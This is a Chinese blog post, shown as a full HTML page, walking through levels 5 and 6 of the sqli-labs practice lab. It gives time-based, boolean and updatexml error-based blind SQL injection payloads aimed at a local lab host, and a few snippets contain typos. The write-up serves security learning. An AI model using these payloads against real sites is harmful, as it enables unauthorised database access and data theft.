<!DOCTYPE html>
<html lang="en">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <link rel="icon" type="image/png" href="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/微信图片_20200713154033.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>sqli-less5-6盲注 - SuQieR&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/github-gist.min.css" />
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_yg9cfy8wd6.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_pjno9b9zyxs.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
<meta name="generator" content="Hexo 4.2.1"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>SuQieR's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                主页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200815115947.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container text-center white-text fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              
  <div class="mt-3 post-meta">
    <i class="iconfont icon-date-fill" aria-hidden="true"></i>
    <time datetime="2020-08-01 09:03">
      August 1, 2020 am
    </time>
  </div>


<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.2k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      19
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <div class="post-content mx-auto" id="post">
            
            <article class="markdown-body">
              <h1 id="less5-or-盲注"><a href="#less5-or-盲注" class="headerlink" title="less5 or 盲注"></a>less5 or 盲注</h1><h2 id="盲注知识点"><a href="#盲注知识点" class="headerlink" title="盲注知识点"></a>盲注知识点</h2><ul>
<li><p>什么是盲注？盲注就是再sql注入过程中，sql语句执行后，查询的数据不能回显到前端页面，此时需要利用一些方法进行判断或尝试，这个过程称之为盲注</p>
</li>
<li><p>从前面的sqli手注基础中，可以得知盲注分为三类</p>
<ul>
<li>基于布尔的sql盲注</li>
<li>基于时间的sql盲注</li>
<li>基于报错的sql盲注</li>
</ul>
</li>
<li><p>四个常用函数</p>
<ul>
<li><p>mid()  此函数用来截取字符串</p>
<table>
<thead>
<tr>
<th>参数</th>
<th align="center">解释</th>
</tr>
</thead>
<tbody><tr>
<td>column_name</td>
<td align="center">必须，要提取字符的字段</td>
</tr>
<tr>
<td>start</td>
<td align="center">必需，规定的起始位置 （起始值为1）</td>
</tr>
<tr>
<td>length</td>
<td align="center">可选，要返回的字符数，如果省略，则mid()函数返回剩余文本</td>
</tr>
</tbody></table>
<pre><code class="hljs mysql">用法：
str&#x3D;&quot;1234&quot;
mid(str,2,1) 结果返回2
mid((select table_name from information_schema.table where table_schema&#x3D;0xxx limit 0,1)1,1)) &gt; &quot;a&quot;
此处的column_name参数可以为sql语句</code></pre>



</li>
</ul>
</li>
</ul>
<ul>
<li><p>substr(column_name,start,length) 这个函数同substring()函数实现的功能是一样的，均为截取字符串，参数同mid()函数，不再重复列举</p>
<pre><code class="hljs mysql">substr(database(),1,2) &gt;&#39;a&#39; 查看数据库名的第一位
substr((select table_name from information_schema.table where table_schema&#x3D;0xxx limit 0,1)1,1) &gt; &#39;a&#39; 
此处的column_name参数可以为sql语句</code></pre>



</li>
</ul>
<ul>
<li><p>left(string,n) 得到字符串左部指定个数的字符</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>解释</th>
</tr>
</thead>
<tbody><tr>
<td>string</td>
<td>截取的字符串</td>
</tr>
<tr>
<td>n</td>
<td>截取长度</td>
</tr>
</tbody></table>
<pre><code class="hljs mysql">用法
left(database()),2 &gt; &#39;a&#39; 查数据库名第一位
left(database()),2 &gt; &#39;ab&#39; 查数据库名前两位
同样的string可以为自行构造的sql语句</code></pre>
</li>
<li><p>udpatexml()</p>
<table>
<thead>
<tr>
<th>参数</th>
<th align="center">解释</th>
</tr>
</thead>
<tbody><tr>
<td>XML_document</td>
<td align="center">为xml文档对象的名称</td>
</tr>
<tr>
<td>XPath_string</td>
<td align="center">XPath格式的字符串</td>
</tr>
<tr>
<td>new_value</td>
<td align="center">string格式，替换查找到符合条件的的数据</td>
</tr>
</tbody></table>
<pre><code class="hljs mysql">用法
select name from user where id&#x3D;1 and updatexml(1,concat(&#39;~&#39;,(select database()),&#39;~&#39;),3);
updatexml() 第二个参数需要xpath格式的字符串，concat()函数为字符串连接函数显然不符合updatexml()的第二个函数需求，所以会将执行结果以报错的形式返回，这样就可以实现报错注入了
结果</code></pre>

<p><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200815102805.png" srcset="/img/loading.gif" alt=""></p>
</li>
</ul>
<h2 id="less5"><a href="#less5" class="headerlink" title="less5"></a>less5</h2><ul>
<li><h3 id="基于时间延迟的盲注"><a href="#基于时间延迟的盲注" class="headerlink" title="基于时间延迟的盲注"></a>基于时间延迟的盲注</h3><ul>
<li>延迟注入，正确的会延迟执行，错误没有延迟，id值无所谓，可通过f12抓包查看延迟状况</li>
<li>爆数据库长度payload</li>
</ul>
<pre><code class="hljs mysql">and if(length(database())&#x3D;8,sleep(5),1) --+  # 判断当前数据库名长度是否为八个字节，是的话延迟5秒执行</code></pre>

<table>
<thead>
<tr>
<th><a href="http://192.168.5.135/sqli/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-5/?id=1&#39;</a> and if(length(database())=8,sleep(5),1) –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814175503.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li>爆数据库名payload</li>
</ul>
<pre><code class="hljs mysql">and if(left(database(),1)&#x3D;&#39;s&#39;,sleep(5),1)--+ # 判断当前数据库名第一个字节是否为s，是的话延迟五秒执行
通过不断替换&#x3D;后面的字符串，正确的字符串会延迟返回，工作量超大这里不赘述</code></pre>

<table>
<thead>
<tr>
<th></th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814181925.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<ul>
<li><h3 id="基于布尔的盲注"><a href="#基于布尔的盲注" class="headerlink" title="基于布尔的盲注"></a>基于布尔的盲注</h3></li>
</ul>
<ul>
<li><p>在布尔盲注中，正确会有回显，错误没有，以此逐字爆破</p>
</li>
<li><p>爆数据库名payload</p>
<pre><code class="hljs mysql">left((select database()),1) &#x3D; &#39;s&#39; --+ # 查询当前数据库名的第一个字符是否等于s，正确则等号后的值正确的话会有回显
left((select database()),2) &#x3D; &#39;se&#39; --+ # 在第一个字符的基础上继续爆破第二个字符
后续的字符同上依次递增</code></pre>

</li>
</ul>
<table>
<thead>
<tr>
<th><a href="http://192.168.5.135/sqli/Less-5/?id=1&#39;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-5/?id=1&#39;</a> and left((select database()),1) = ‘s’ –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200814184105.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<ul>
<li><h3 id="concat聚合函数"><a href="#concat聚合函数" class="headerlink" title="concat聚合函数"></a>concat聚合函数</h3></li>
</ul>
<ul>
<li><p>使用coucat函数如果分组语句，会把查询的一部分以错误的形式显示出来</p>
<pre><code class="hljs mysql">and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+ # 将数据库名以报错的方式回显
and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema &#x3D; database() limit%20 3,1),0x7e),1) --+ # 查询当前数据库下的表名，一次只能返回一个结果，需要多次替换limit n，1 来实现遍历表名</code></pre>

</li>
</ul>
<table>
<thead>
<tr>
<th>192.168.5.135/sqli/Less-5/?id=1’ and updatexml(1,concat(0x7e,(select ),0x7e),1) –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200815104502.png" srcset="/img/loading.gif" alt=""></td>
</tr>
<tr>
<td><a href="http://192.168.5.135/sqli/Less-5/?id=-1&#39;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-5/?id=-1&#39;</a> and updatexml(1,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema = database() limit%20 3,1),0x7e),1) –+</td>
</tr>
<tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200815110426.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
<h2 id="less6"><a href="#less6" class="headerlink" title="less6"></a>less6</h2><ul>
<li><p>less5与less6的区别在id参数传到服务器时对id参数进行了处理，从源代码可以看到查询语句为</p>
<pre><code class="hljs mysql">$id&#x3D;&#39;&quot;&#39;.$id.&#39;&quot;&#39;; 
$sql&#x3D;&quot;SELECT * FROM users WHERE id &#x3D; $id LIMIT0,1&quot;;</code></pre>
</li>
<li><p>那么这一关的通关策略和less5一样，只需要将‘变成“即可，这里只记录一个payload</p>
<table>
<thead>
<tr>
<th><a href="http://192.168.5.135/sqli/Less-6/?id=1&quot;" target="_blank" rel="noopener">http://192.168.5.135/sqli/Less-6/?id=1&quot;</a> and left(version(),1) –+</th>
</tr>
</thead>
<tbody><tr>
<td><img src="https://lynn-sec-blogimage.oss-cn-shenzhen.aliyuncs.com/img/20200815115503.png" srcset="/img/loading.gif" alt=""></td>
</tr>
</tbody></table>
</li>
</ul>
<h2 id="小结"><a href="#小结" class="headerlink" title="小结"></a>小结</h2><ul>
<li>盲注这个东西，难度相对于其他类型的注入来说挺大的，确实复杂，而且各个类型以及骚操作都很多。</li>
<li>掌握常用的盲注函数以及能够构造简单的payload就差不多了。（主要是复杂的构造不出来……）</li>
<li>如果能够证明有盲注的存在，那么sqlmap一把嗦不香吗</li>
</ul>

            </article>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/web%E6%B8%97%E9%80%8F/">web渗透</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/sql%E7%9B%B2%E6%B3%A8/">sql盲注</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <div class="post-prev col-6">
                    
                    
                  </div>
                  <div class="post-next col-6">
                    
                    
                      <a href="/2020/07/31/%E8%A7%A3%E5%86%B3firefox_%E5%A4%8D%E5%88%B6url_%E4%BC%9A%E8%87%AA%E5%8A%A8encodeurl/">
                        <span class="hidden-mobile">解决firefox复制url会自动encodeurl</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </div>
                </div>
              
            </div>

            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a id="scroll-top-button" href="#" role="button">
      <i class="iconfont icon-arrowup" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Power by SuQieR</span></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener">
        <span>Hexo theme by Fluid</span></a>
    </div>
    

    
  <!-- 备案信息 -->
  <div class="beian">
    <a href="http://beian.miit.gov.cn/" target="_blank"
       rel="nofollow noopener">京 ICP 备 20020711 号</a>
    
      <a
        href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=20020711"
        rel="nofollow noopener"
        class="beian-police"
        target="_blank"
      >
        <span class="beian-police-sep">&nbsp;|&nbsp;</span>
        
          <img src="/img/police_beian.png" srcset="/img/loading.gif" alt="police-icon" />
        
        <span>京公网安备 11010802032018 号</span>
      </a>
     
  </div>


    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/main.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>
  <script  src="/js/clipboard-use.js" ></script>







  <script  src="https://cdn.staticfile.org/tocbot/4.11.1/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var boardCtn = $('#board-ctn');
      var boardTop = boardCtn.offset().top;

      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: 'article.markdown-body',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        collapseDepth: 0,
        scrollSmooth: true,
        headingsOffset: -boardTop
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc').css('visibility', 'visible');
      }
    });
  </script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "sqli-less5-6盲注&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      searchFunc(path, 'local-search-input', 'local-search-result');
      this.onclick = null
    }
  </script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />

  <script>
    $('#post img:not(.no-zoom img, img[no-zoom]), img[zoom]').each(
      function () {
        var element = document.createElement('a');
        $(element).attr('data-fancybox', 'images');
        $(element).attr('href', $(this).attr('src'));
        $(this).wrap(element);
      }
    );
  </script>







  
  
    <script type="text/javascript">
      //定义获取词语下标
      var a_idx = 0;
      jQuery(document).ready(function ($) {
        //点击body时触发事件
        $("body").click(function (e) {
          //需要显示的词语
          var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正", "法治", "爱国", "敬业", "诚信", "友善");
          //设置词语给span标签
          var $i = $("<span/>").text(a[a_idx]);
          //下标等于原来下标+1  余 词语总数
          a_idx = (a_idx + 1) % a.length;
          //获取鼠标指针的位置，分别相对于文档的左和右边缘。
          //获取x和y的指针坐标
          var x = e.pageX, y = e.pageY;
          //在鼠标的指针的位置给$i定义的span标签添加css样式
          $i.css({
            "z-index": 999,
            "top": y - 20,
            "left": x,
            "position": "absolute",
            "font-weight": "bold",
            "color": rand_color()
          });
          // 随机颜色
          function rand_color() {
            return "rgb(" + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + "," + ~~(255 * Math.random()) + ")"
          }
          //在body添加这个标签
          $("body").append($i);
          //animate() 方法执行 CSS 属性集的自定义动画。
          //该方法通过CSS样式将元素从一个状态改变为另一个状态。CSS属性值是逐渐改变的，这样就可以创建动画效果。
          //详情请看http://www.w3school.com.cn/jquery/effect_animate.asp
          $i.animate({
            //将原来的位置向上移动180
            "top": y - 180,
            "opacity": 0
            //1500动画的速度
          }, 1500, function () {
            //时间到了自动删除
            $i.remove();
          });
        });
      })
      ;
    </script>
  














</body>
</html>
